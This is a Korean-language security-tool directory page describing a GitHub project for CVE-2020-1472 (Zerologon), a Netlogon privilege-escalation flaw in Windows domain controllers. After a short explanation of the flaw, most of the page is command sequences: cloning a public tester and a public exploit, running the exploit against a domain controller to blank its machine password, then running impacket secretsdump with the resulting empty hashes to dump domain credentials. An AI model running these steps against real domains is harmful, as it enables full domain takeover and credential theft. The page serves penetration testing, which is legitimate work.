Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/murataydemir/cve-2020-1472
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingAuthenticationRed Teaming
GitHubmurataydemir/cve-2020-1472

CVE-2020-1472

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) 권한 상승 (Zerologon)

저장소 보기
125년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

[CVE-2020-1472] Netlogon 원격 프로토콜 호출(MS-NRPC) 권한 상승 (Zerologon)

여기에 설명된 공격은 도메인 가입 컴퓨터의 신뢰성과 신원을 도메인 컨트롤러(DC)에 증명하는 암호화 인증 프로토콜(AES-CFB8의 안전하지 않은 사용)의 결함을 이용합니다. AES 운영 모드의 잘못된 사용으로 인해 모든 컴퓨터 계정(DC 자체 포함)의 신원을 스푸핑하고 해당 도메인 계정에 빈 암호(여러 필드가 0으로 채워진 여러 Netlogon 메시지를 보내는 것만으로)를 설정할 수 있습니다. 이후 이를 사용하여 도메인 관리자 자격 증명을 획득한 다음 원래 DC 암호를 복원할 수 있습니다.

CVE-2020-1472 점검을 위해

  • git clone https://github.com/SecuraBV/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • pip install -r requirements.txt
  • python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (예: ./zerologon_tester.py DC01 172.16.208.161)

CVE-2020-1472 악용을 위해

  • git clone https://github.com/dirkjanm/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (예: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
  • git clone https://github.com/SecureAuthCorp/impacket.git
  • cd impacket
  • pip install .
  • python setup.py install
  • cd examples

그런 다음 다음 명령 중 하나를 실행합니다

형식 예 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
형식 예 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Image of PoC

원본 블로그 게시물은 여기에서 확인할 수 있습니다
Python 테스트 스크립트가 포함된 원본 저장소는 여기에서 확인할 수 있습니다
Python 악용 스크립트가 포함된 원본 저장소는 여기에서 확인할 수 있습니다

도구 다운로드